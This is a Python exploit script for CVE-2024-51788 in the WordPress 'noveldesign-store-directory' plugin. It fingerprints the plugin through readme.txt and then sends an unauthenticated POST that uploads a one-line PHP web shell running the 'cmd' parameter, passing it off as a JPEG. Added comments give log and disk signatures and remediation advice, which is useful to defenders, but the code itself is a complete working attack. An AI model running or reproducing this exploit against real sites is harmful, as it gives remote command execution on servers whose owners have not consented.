# Cosmetic ASCII-art banner, printed as soon as the module runs (before argument parsing).
# It has no effect on the requests sent further down.
print('''
:'######::'##::::'##:'########:::::::::::'#######::::'#####::::'#######::'##:::::::::::::::::'########::::'##:::'########::'#######:::'#######::
'##... ##: ##:::: ##: ##.....:::::::::::'##.... ##::'##.. ##::'##.... ##: ##:::'##::::::::::: ##.....:::'####::: ##.. ##:'##.... ##:'##.... ##:
##:::..:: ##:::: ##: ##::::::::::::::::..::::: ##:'##:::: ##:..::::: ##: ##::: ##::::::::::: ##::::::::.. ##:::..:: ##::: ##:::: ##: ##:::: ##:
##::::::: ##:::: ##: ######:::'#######::'#######:: ##:::: ##::'#######:: ##::: ##::'#######: #######::::: ##:::::: ##::::: #######::: #######::
##:::::::. ##:: ##:: ##...::::........:'##:::::::: ##:::: ##:'##:::::::: #########:........:...... ##:::: ##::::: ##:::::'##.... ##:'##.... ##:
##::: ##::. ## ##::: ##:::::::::::::::: ##::::::::. ##:: ##:: ##::::::::...... ##:::::::::::'##::: ##:::: ##::::: ##::::: ##:::: ##: ##:::: ##:
. ######::::. ###:::: ########:::::::::: #########::. #####::: #########::::::: ##:::::::::::. ######:::'######::: ##:::::. #######::. #######::
:......::::::...:::::........:::::::::::.........::::.....::::.........::::::::..:::::::::::::......::::......::::..:::::::.......::::.......:::
''')
# Exploit By: Coded By : Nxploit | Khaled ALenazi,
import requests
import random
import string
import argparse
from urllib3.exceptions import InsecureRequestWarning
# Silences urllib3's certificate warnings: every request in this file is sent with
# TLS verification disabled (verify=False), so the peer's identity is never checked.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Site-relative directory that upload_shell() reports as the upload location.
# For defenders: this directory is expected to hold images only, so any *.php file in it
# is worth investigating, and PHP execution can be denied for it at the web-server level.
UPLOAD_DIR = "/wp-content/plugins/noveldesign-store-directory/images/"
# Fixed browser-like User-Agent sent on every request. It is a constant in this script,
# so it is at best a weak log indicator (trivially changed by whoever runs it).
USER_AGENT = (
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/113.0.0.0 Safari/537.36"
)
def generate_random_cookie():
    """Return a 64-character random string of ASCII letters and digits.

    The value is random filler, not a session token issued by the site;
    upload_shell() sends it as the ``wordpress_logged_in`` cookie.
    """
    alphabet = string.ascii_letters + string.digits
    return ''.join(random.choices(alphabet, k=64))
def check_version(target_url):
    """Fetch the plugin's readme.txt and decide from its "Stable tag" line whether to continue.

    Returns True when the readme is served with HTTP 200 and contains one of the
    version strings tested below, and also when the readme is NOT served with
    HTTP 200. Returns False only when the readme is served and matches neither string.

    NOTE(review): this is a banner heuristic, not proof of vulnerability. A "vulnerable"
    message from this function should not be treated as a confirmed finding.
    """
    url_version = f"{target_url}/wp-content/plugins/noveldesign-store-directory/readme.txt"
    # TLS verification is off and no timeout is passed, so the call can block
    # indefinitely on an unresponsive host.
    response = requests.get(url_version, verify=False, headers={"User-Agent": USER_AGENT})
    if response.status_code == 200:
        # "Stable tag: 4." is a prefix of "Stable tag: 4.3.0", so the first test is redundant:
        # any readme declaring a 4.x stable tag matches. A fixed 4.x release, if one exists,
        # would therefore still be reported as vulnerable (false positive).
        if "Stable tag: 4.3.0" in response.text or "Stable tag: 4." in response.text:
            print("[✔] Target is vulnerable! Continuing exploitation...\n")
            return True
        print("[✘] Target does not appear to be vulnerable. Exiting.\n")
        return False
    # Any non-200 answer (readme removed, blocked, redirected, server error) falls through
    # to True. For defenders: hiding or blocking readme.txt does not stop the upload
    # request from being sent, so it is not a mitigation for CVE-2024-51788.
    print("[!] Could not verify version. Proceeding with exploitation...\n")
    return True
def upload_shell(target_url):
    """Send one multipart POST carrying a PHP file to the plugin's settings page.

    The request goes to ``/wp-admin/options-general.php?page=licence`` with the file in the
    ``default_shop_image`` form field. Nothing is returned; the outcome is only printed.

    NOTE(review), for detection and remediation:
    - Log signature: a multipart POST to the URL above whose ``default_shop_image`` part
      has a ``.php`` filename while declaring ``image/jpeg``.
    - On-disk signature: a ``.php`` file under UPLOAD_DIR. The ``Nxploit_<4 digits>.php``
      name is specific to this script and trivially changed, so match on the extension.
    - The handler presumably lacks a capability/nonce check and server-side file-type
      validation (the script relies on neither a valid session nor an image payload);
      confirm against the plugin source. Updating or removing the plugin and denying PHP
      execution in the upload directory address the issue independently of this script.
    """
    upload_url = f"{target_url}/wp-admin/options-general.php?page=licence"
    # None of these cookies is obtained from the site. The login cookie holds a random
    # value (genuine WordPress login cookies are named wordpress_logged_in_<hash>), so the
    # request is effectively unauthenticated.
    cookies = {
        "wordpress_logged_in": generate_random_cookie(),
        "wp_lang": "en_US",
        "wp-settings-1": "libraryContent=browse&urlbutton=post&hidetb=1",
        "wp-settings-time-1": str(random.randint(1600000000, 1800000000)),
    }
    # Randomised file name with a .php extension.
    shell_name = f"Nxploit_{random.randint(1000, 9999)}.php"
    # Payload: a one-line PHP script that runs the ``cmd`` query parameter as a system command.
    shell_content = "<?php system($_GET['cmd']); ?>"
    # The part declares Content-Type image/jpeg although the body is PHP source; a check
    # that trusts the client-supplied MIME type would accept it.
    files = {
        "default_shop_image": (shell_name, shell_content, "image/jpeg"),
        "btn_default_shop_image": (None, "Upload"),
    }
    session = requests.Session()
    # Certificate validation is disabled for this session as well.
    session.verify = False
    response = session.post(upload_url, files=files, cookies=cookies, headers={"User-Agent": USER_AGENT})
    # Only the HTTP status is inspected. A 200 does not show that a file was written (a
    # login page or an error page can also be served with 200), so the success message
    # below is not evidence of compromise; check the upload directory on disk instead.
    if response.status_code == 200:
        print("[✔] Web Shell successfully uploaded!")
        print(f" [+] Shell is located in: {UPLOAD_DIR}\n")
    else:
        print("[✘] Exploit failed. Server did not respond as expected.\n")
if __name__ == "__main__":
    # Command-line entry point: takes one required base URL (-u/--url).
    parser = argparse.ArgumentParser(description='Exploit script for CVE-2024-51788 by Nxploit Khaled Alenazi.')
    parser.add_argument('-u', '--url', required=True, help='Target URL')
    args = parser.parse_args()
    # Trailing slashes are stripped because the request paths are appended with a leading "/".
    # The URL is otherwise used as given (no scheme or host validation).
    target = args.url.rstrip('/')
    print(f"[*] Checking if {target} is vulnerable...\n")
    # check_version() also returns True when the readme cannot be fetched, so the upload
    # request is sent in every case except an explicit non-matching readme.
    if check_version(target):
        print("[*] Attempting to upload Web Shell...\n")
        upload_shell(target)